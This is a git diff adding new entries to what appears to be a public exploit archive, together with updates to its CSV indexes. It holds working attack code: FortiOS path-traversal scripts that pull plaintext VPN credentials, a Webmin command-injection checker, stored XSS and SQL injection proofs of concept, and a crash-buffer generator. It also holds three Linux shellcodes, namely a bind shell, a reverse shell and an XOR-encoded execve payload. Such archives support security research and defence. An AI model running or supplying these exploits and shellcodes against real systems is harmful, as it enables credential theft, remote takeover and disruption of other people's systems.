diff --git a/exploits/hardware/webapps/47287.rb b/exploits/hardware/webapps/47287.rb new file mode 100755 index 000000000..48eca7846 --- /dev/null +++ b/exploits/hardware/webapps/47287.rb @@ -0,0 +1,78 @@ +# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. +# Google Dork: intext:"Please Login" inurl:"/remote/login" +# Date: 17/08/2019 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://www.fortinet.com/ +# Software Link: https://www.fortinet.com/products/fortigate/fortios.html +# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). +# Tested on: 5.6.6 +# CVE : CVE-2018-13379 + +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Post::File + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SSL VPN FortiOs - System file leak', + 'Description' => %q{ + FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. + This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). + This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). + }, + 'References' => + [ + [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ] + ], + 'Author' => [ 'lynx (Carlos Vieira)' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => + { + 'RPORT' => 443, + 'SSL' => true + }, + )) + + end + + + def run() + print_good("Checking target...") + res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}) + + if res && res.code == 200 + print_good("Target is Vulnerable!") + data = res.body + current_host = datastore['RHOST'] + filename = "msf_sslwebsession_"+current_host+".bin" + File.delete(filename) if File.exist?(filename) + file_local_write(filename, data) + print_good("Parsing binary file.......") + parse() + else + if(res && res.code == 404) + print_error("Target not Vulnerable") + else + print_error("Ow crap, try again...") + end + end + end + def parse() + current_host = datastore['RHOST'] + + fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") + words = 0 + while (line = fileObj.gets) + printable_data = line.gsub(/[^[:print:]]/, '.') + array_data = printable_data.scan(/.{1,60}/m) + for ar in array_data + if ar != "............................................................" + print_good(ar) + end + end + #print_good(printable_data) + + end + fileObj.close + end +end \ No newline at end of file diff --git a/exploits/hardware/webapps/47288.py b/exploits/hardware/webapps/47288.py new file mode 100755 index 000000000..8e0cde795 --- /dev/null +++ b/exploits/hardware/webapps/47288.py @@ -0,0 +1,96 @@ +# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. +# Google Dork: intext:"Please Login" inurl:"/remote/login" +# Date: 17/08/2019 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://www.fortinet.com/ +# Software Link: https://www.fortinet.com/products/fortigate/fortios.html +# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). +# Tested on: 5.6.6 +# CVE : CVE-2018-13379 + +# Exploit SSLVPN Fortinet - FortiOs +#!/usr/bin/env python +import requests, sys, time +import urllib3 +urllib3.disable_warnings() + + +def leak(host, port): + print("[!] Leak information...") + try: + url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" + headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + r=requests.get(url, headers=headers, verify=False, stream=True) + img=r.raw.read() + if "var fgt_lang =" in str(img): + with open("sslvpn_websession_"+host+".dat", 'w') as f: + f.write(img) + print("[>] Save to file ....") + parse(host) + print("\n") + return True + else: + return False + except requests.exceptions.ConnectionError: + return False +def is_character_printable(s): + return all((ord(c) < 127) and (ord(c) >= 32) for c in s) + +def is_printable(byte): + if is_character_printable(byte): + return byte + else: + return '.' + +def read_bytes(host, chunksize=8192): + print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat") + with open("sslvpn_websession_"+host+".dat", "rb") as f: + while True: + chunk = f.read(chunksize) + if chunk: + for b in chunk: + yield b + else: + break +def parse(host): + print("[!] Parsing Information...") + memory_address = 0 + ascii_string = "" + for byte in read_bytes(host): + ascii_string = ascii_string + is_printable(byte) + if memory_address%61 == 60: + if ascii_string!=".............................................................": + print ascii_string + ascii_string = "" + memory_address = memory_address + 1 + +def check(host, port): + print("[!] Check vuln...") + uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" + try: + r = requests.get("https://" + host + ":" + port + uri, verify=False) + if(r.status_code == 200): + return True + elif(r.status_code == 404): + return False + else: + return False + except: + return False +def main(host, port): + print("[+] Start exploiting....") + vuln = check(host, port) + if(vuln): + print("[+] Target is vulnerable!") + bin_file = leak(host, port) + else: + print("[X] Target not vulnerable.") + +if __name__ == "__main__": + + if(len(sys.argv) < 3): + print("Use: python {} ip/dns port".format(sys.argv[0])) + else: + host = sys.argv[1] + port = sys.argv[2] + main(host, port) \ No newline at end of file diff --git a/exploits/linux/webapps/47293.sh b/exploits/linux/webapps/47293.sh new file mode 100755 index 000000000..37277996b --- /dev/null +++ b/exploits/linux/webapps/47293.sh @@ -0,0 +1,31 @@ +#!/bin/sh +# +# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution +# based on Metasploit module https://www.exploit-db.com/exploits/47230 +# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html +# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin +# +# Fernando A. Lagos B. (Zerial) +# https://blog.zerial.org +# https://blog.nivel4.com +# +# The script sends a flag by a echo command then grep it. If match, target is vulnerable. +# +# Usage: sh CVE-2019-15107.sh https://target:port +# Example: sh CVE-2019-15107.sh https://localhost:10000 +# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE! +# + +FLAG="f3a0c13c3765137bcde68572707ae5c0" +URI=$1; + +echo -n "Testing for RCE (CVE-2019-15107) on $URI: "; +curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1 + +if [ $? -eq 0 ]; +then + echo '\033[0;31mVULNERABLE!\033[0m' +else + echo '\033[0;32mOK! (target is not vulnerable)\033[0m' +fi +#EOF \ No newline at end of file diff --git a/exploits/php/webapps/47286.txt b/exploits/php/webapps/47286.txt new file mode 100644 index 000000000..fe5d918d6 --- /dev/null +++ b/exploits/php/webapps/47286.txt @@ -0,0 +1,32 @@ +# Exploit Title: Kimai 2- persistent cross-site scripting (XSS) +# Date: 07/15/2019 +# Exploit Author: osamaalaa +# Vendor Homepage: [link] +# Software Link: https://github.com/kevinpapst/kimai2 +# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962 +# Version: 2 + +1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create + +2-Add this payload "> in the description + +3-Save The changes + +4-refresh and we have alert pop up! + +The Request POC : + +POST /index.php/en/timesheet/create HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 392 +Connection: close +Referer: http://localhost +Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv + +timesheet_edit_form[begin]=2019-08-17 13:02×heet_edit_form[end]=2019-08-18 00:00×heet_edit_form[customer]=12×heet_edit_form[project]=24×heet_edit_form[activity]=27×heet_edit_form[description]= ">×heet_edit_form[tags]=×heet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0 \ No newline at end of file diff --git a/exploits/php/webapps/47289.txt b/exploits/php/webapps/47289.txt new file mode 100644 index 000000000..da318036f --- /dev/null +++ b/exploits/php/webapps/47289.txt @@ -0,0 +1,57 @@ +# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability +# Date: 18.8.2019. +# Exploit Author: n1x_ [MS-WEB] +# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547 +# Version: 3.5 +# CWE : CWE-79 + +[Description] + +# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations. +# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability. + +[Proof of Concept] + +# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login] +# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket] +# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid] + +[Example paylods] + +# Example payload: "> +# Example payload: "> + +[POST Request] + +POST /neo/crm/tickets/addticket HTTP/1.1 +Host: host +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: //host/neo/crm/tickets/addticket +Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523 +Content-Length: 694 +Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="title" + +"> +-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="content" + +

">

+-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="files"; filename="" +Content-Type: application/octet-stream + + +-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="userfile"; filename="" +Content-Type: application/octet-stream + + +-----------------------------899768029113033755249127523-- \ No newline at end of file diff --git a/exploits/php/webapps/47294.txt b/exploits/php/webapps/47294.txt new file mode 100644 index 000000000..903f7b3b1 --- /dev/null +++ b/exploits/php/webapps/47294.txt @@ -0,0 +1,36 @@ +# Exploit Title: YouPHPTube < 7.3 SQL Injection +# Google Dork: / +# Date: 19.08.2019 +# Exploit Author: Fabian Mosch, r-tec IT Security GmbH +# Vendor Homepage: https://www.youphptube.com/ +# Software Link: https://github.com/YouPHPTube/YouPHPTube +# Version: < 7.3 +# Tested on: Linux/Windows +# CVE : CVE-2019-14430 + +The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example. + +Example Request: + +POST /objects/userCreate.json.php HTTP/1.1 +Host: vulnerablehost.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +[SomeHeaders and Cookies] + +user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx + +Methods for DB-Extraction are: + + +- Boolean-based blind + +- Error-based + +- AND/OR time-based blind + + +The vulnerability was fixed with this commit: +https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a \ No newline at end of file diff --git a/exploits/windows/dos/47285.py b/exploits/windows/dos/47285.py new file mode 100755 index 000000000..780348c04 --- /dev/null +++ b/exploits/windows/dos/47285.py @@ -0,0 +1,29 @@ +# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit +# Date: 16.08.2019 +# Vendor Homepage:https://www.top-password.com/ +# Software Link: https://www.top-password.com/download/RARPRSetup.exe +# Exploit Author: Achilles +# Tested Version: v1.80 +# Tested on: Windows 7 x64 +# Windows XP SP3 + + +# 1.- Run python code :RAR Password Recovery.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open RAR Password Recovery and Click 'Register' +# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' +# 5.- Click 'OK' and you will see a crash. + + + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 179187f8e..7fa453b14 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6550,6 +6550,7 @@ id,file,description,date,author,type,platform,port 47278,exploits/windows/dos/47278.txt,"Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-08-15,"Google Security Research",dos,windows, 47279,exploits/windows/dos/47279.txt,"Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows, 47282,exploits/windows_x86-64/dos/47282.txt,"GetGo Download Manager 6.2.2.3300 - Denial of Service",2019-08-16,"Malav Vyas",dos,windows_x86-64, +47285,exploits/windows/dos/47285.py,"RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service",2019-08-19,Achilles,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -41646,3 +41647,9 @@ id,file,description,date,author,type,platform,port 47281,exploits/php/webapps/47281.txt,"Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion",2019-08-16,qw3rTyTy,webapps,php, 47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php, 47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp, +47286,exploits/php/webapps/47286.txt,"Kimai 2 - Persistent Cross-Site Scripting",2019-08-19,osamaalaa,webapps,php,80 +47287,exploits/hardware/webapps/47287.rb,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware, +47288,exploits/hardware/webapps/47288.py,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware, +47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80 +47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux, +47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index ddac87adc..831e71cfb 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -996,3 +996,6 @@ id,file,description,date,author,type,platform 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux 47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86 47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86 +47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 +47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 +47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/47290.c b/shellcodes/linux_x86-64/47290.c new file mode 100644 index 000000000..176bcdeff --- /dev/null +++ b/shellcodes/linux_x86-64/47290.c @@ -0,0 +1,189 @@ +/* +; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes) +; Date : 2019-08-18 +; Author : Gonçalo Ribeiro (@goncalor) +; Website : goncalor.com +; SLAE64-ID : 1635 + +global _start + +%define pass "pass" +%define port 0x5c11 ; htons(4444) + +_start: + jmp real_start + password: db pass + pass_len: db $-password + +real_start: +socket: + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; __NR_socket = 41 + ; On success, a file descriptor for the new socket is returned + + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx) + syscall + + push rax + pop rdi + +bind: + ; server.sin_family = AF_INET; short + ; server.sin_port = htons(4444); unsigned short + ; server.sin_addr.s_addr = INADDR_ANY; unsigned long + ; bzero(&server.sin_zero, 8); + ; + ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html + ; struct sockaddr_in { + ; short sin_family; + ; unsigned short sin_port; + ; struct in_addr sin_addr; + ; char sin_zero[8]; + ; }; + ; + ; bind(sock, (struct sockaddr *)&server, sockaddr_len) + ; INADDR_ANY = 0 + ; AF_INET = 2 + ; __NR_bind = 49 + ; On success, zero is returned + + xor eax, eax ; shorter and will still zero the upper bytes + push rax ; sin_zero + push ax + push ax ; sin_addr + push word port + push word 2 + + ; bind + add al, 49 + push rsp + pop rsi + add dl, 16 ; sizeof(sockaddr_in) + syscall + +listen: + ; listen(sock, 2) + ; __NR_listen = 50 + ; On success, zero is returned + + mov al, 50 + xor esi, esi + mov sil, 2 + syscall + +accept: + ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) + ; __NR_accept = 43 + ; On success, a file descriptor is returned + + mov al, 43 + xor esi, esi + ;xor rdx, rdx ; already zeroed + syscall + + push rax + +;close: + ; close(sock) + ; __NR_close = 3 + ; returns zero on success + + ; closing is not strictly necessary + ;mov al, 3 + ;syscall + +dup2: + ; dup2(new, 0); + ; dup2(new, 1); + ; dup2(new, 2); + ; __NR_dup2 = 33 + ; On success, return the new file descriptor + + pop rdi ; "new" was pushed in accept() + push 2 + pop rsi + +dup2_loop: + mov al, 33 + syscall + dec esi + jns dup2_loop + +read_password: + ; read(int fd, void *buf, size_t count) + ; On success, the number of bytes read is returned + + ;xor eax, eax ; already done by dup2 + ;rdi = "new" ; already done in dup2 + push rax + push rax ; create space for "buf" in the stack + push rsp + pop rsi ; rsi = *buf + mov dl, 16 + syscall + +compare_password: + xor ecx, ecx + lea rdi, [rel pass_len] + mov cl, [rdi] + sub rdi, rcx + cld + repz cmpsb + jne exit + +execve: + ; execve(const char *path, char *const argv[], char *const envp[]) + ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding) + ; rsi, argv = (char**) (/bin//sh, 0x00) + ; rdx, envp = &0x00 + + xor eax, eax + push rax + push rsp + pop rdx ; *rdx = &0x00 + + mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev) + push rsi + push rsp + pop rdi ; rdi = (char*) /bin//sh + + push rax + push rdi + push rsp + pop rsi ; rsi = (char**) (/bin//sh, 0x00) + + mov al, 59 + syscall + +exit: + ;xor eax, eax ; upper bytes are zero after read + mov al, 60 + syscall +*/ + + +#include +#include + +char code[] = +"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f" +"\x05\x50\x5f\x31\xc0\x50\x66\x50\x66\x50\x66\x68\x11\x5c\x66\x6a\x02\x04" +"\x31\x54\x5e\x80\xc2\x10\x0f\x05\xb0\x32\x31\xf6\x40\xb6\x02\x0f\x05\xb0" +"\x2b\x31\xf6\x0f\x05\x50\x5f\x6a\x02\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8" +"\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31\xc9\x48\x8d\x3d\xad\xff\xff\xff\x8a" +"\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62" +"\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0" +"\x3c\x0f\x05"; + +int main() { + printf("length: %lu\n", strlen(code)); + ((int(*)()) code)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/47291.c b/shellcodes/linux_x86-64/47291.c new file mode 100644 index 000000000..bbc44c671 --- /dev/null +++ b/shellcodes/linux_x86-64/47291.c @@ -0,0 +1,155 @@ +/* +; Title : Linux/x86_64 - Reverse Shell (/bin/sh) with Password (configurable) (120 bytes) +; Date : 2019-08-18 +; Author : Gonçalo Ribeiro (@goncalor) +; Website : goncalor.com +; SLAE64-ID : 1635 + +global _start + +%define pass "pass" +%define port 0x5c11 ; htons(4444) + +_start: + jmp real_start + password: db pass + pass_len: db $-password + +real_start: +socket: + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; __NR_socket = 41 + ; On success, a file descriptor for the new socket is returned + + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx) + syscall + + push rax + pop rdi + +connect: + ; server.sin_family = AF_INET; short + ; server.sin_port = htons(4444); unsigned short + ; server.sin_addr.s_addr = inet_addr("127.0.0.1"); unsigned long + ; bzero(&server.sin_zero, 8); + ; + ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html + ; struct sockaddr_in { + ; short sin_family; + ; unsigned short sin_port; + ; struct in_addr sin_addr; + ; char sin_zero[8]; + ; }; + ; + ; connect(sock, (struct sockaddr *)&server, sockaddr_len) + ; AF_INET = 2 + ; __NR_connect = 42 + ; On success, zero is returned + + xor eax, eax + push rax ; sin_zero + push 0x10ffff70 ; sin_addr (xored) + xor dword [rsp], 0x11ffff0f ; recover sin_addr + push word port + push word 2 + + ; connect + add al, 42 + push rsp + pop rsi + add dl, 16 ; sizeof(sockaddr_in) + syscall + +dup2: + ; dup2(sock, 0); + ; dup2(sock, 1); + ; dup2(sock, 2); + ; __NR_dup2 = 33 + ; On success, return the new file descriptor + + push 2 + pop rsi + +dup2_loop: + mov al, 33 + syscall + dec esi + jns dup2_loop + +read_password: + ; read(int fd, void *buf, size_t count) + ; On success, the number of bytes read is returned + + ;xor eax, eax ; already done by dup2 + ;rdi = "sock" ; already done + push rax + push rax ; create space for "buf" in the stack + push rsp + pop rsi ; rsi = *buf + mov dl, 16 + syscall + +compare_password: + xor ecx, ecx + lea rdi, [rel pass_len] + mov cl, [rdi] + sub rdi, rcx + cld + repz cmpsb + jne exit + +execve: + ; execve(const char *path, char *const argv[], char *const envp[]) + ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding) + ; rsi, argv = (char**) (/bin//sh, 0x00) + ; rdx, envp = &0x00 + + xor eax, eax + push rax + push rsp + pop rdx ; *rdx = &0x00 + + mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev) + push rsi + push rsp + pop rdi ; rdi = (char*) /bin//sh + + push rax + push rdi + push rsp + pop rsi ; rsi = (char**) (/bin//sh, 0x00) + + mov al, 59 + syscall + +exit: + ;xor eax, eax ; upper bytes are zero after read + mov al, 60 + syscall +*/ + + +#include +#include + +char code[] = +"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f" +"\x05\x50\x5f\x31\xc0\x50\x68\x70\xff\xff\x10\x81\x34\x24\x0f\xff\xff\x11" +"\x66\x68\x11\x5c\x66\x6a\x02\x04\x2a\x54\x5e\x80\xc2\x10\x0f\x05\x6a\x02" +"\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31" +"\xc9\x48\x8d\x3d\xb6\xff\xff\xff\x8a\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a" +"\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f" +"\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0\x3c\x0f\x05"; + +int main() { + printf("length: %lu\n", strlen(code)); + ((int(*)()) code)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/47292.c b/shellcodes/linux_x86-64/47292.c new file mode 100644 index 000000000..04ad71638 --- /dev/null +++ b/shellcodes/linux_x86-64/47292.c @@ -0,0 +1,47 @@ +/* +; Title : Linux/x86_64 - AVX2 XOR Decoder + execve("/bin/sh") (62 bytes) +; Date : 2019-08-18 +; Author : Gonçalo Ribeiro (@goncalor) +; Website : goncalor.com +; SLAE64-ID : 1635 + +; this only works on machines with a CPU that supports AVX2 instructions + +global _start + +_start: + jmp call_decoder + +decoder: + pop rsi + lea rdi, [rsi+1] + + ; shellcode is less than 32 bytes long. can decode with single 256-bit xor. + ; for longer shellcodes a loop could be added + vpbroadcastb ymm1, [rsi] ; avx2 + vmovdqu ymm0, [rdi] ; avx + vpxor ymm0, ymm1 ; avx2 + vmovdqu [rdi], ymm0 ; avx + + jmp encoded_shellcode + +call_decoder: + call decoder + xor_value: db 0xaa + encoded_shellcode: db 0xe2,0x9b,0x6a,0xfa,0xe2,0x23,0x48,0xe2,0x14,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfc,0xe2,0x23,0x4d,0xfa,0xfd,0xe2,0x23,0x4c,0x1a,0x91,0xa5,0xaf +*/ + + +#include +#include + +char code[] = +"\xeb\x18\x5e\x48\x8d\x7e\x01\xc4\xe2\x7d\x78\x0e\xc5\xfe\x6f\x07\xc5\xfd" +"\xef\xc1\xc5\xfe\x7f\x07\xeb\x06\xe8\xe3\xff\xff\xff\xaa\xe2\x9b\x6a\xfa" +"\xe2\x23\x48\xe2\x14\x85\xc8\xc3\xc4\x85\x85\xd9\xc2\xfc\xe2\x23\x4d\xfa" +"\xfd\xe2\x23\x4c\x1a\x91\xa5\xaf"; + +int main() { + printf("length: %lu\n", strlen(code)); + ((int(*)()) code)(); +} \ No newline at end of file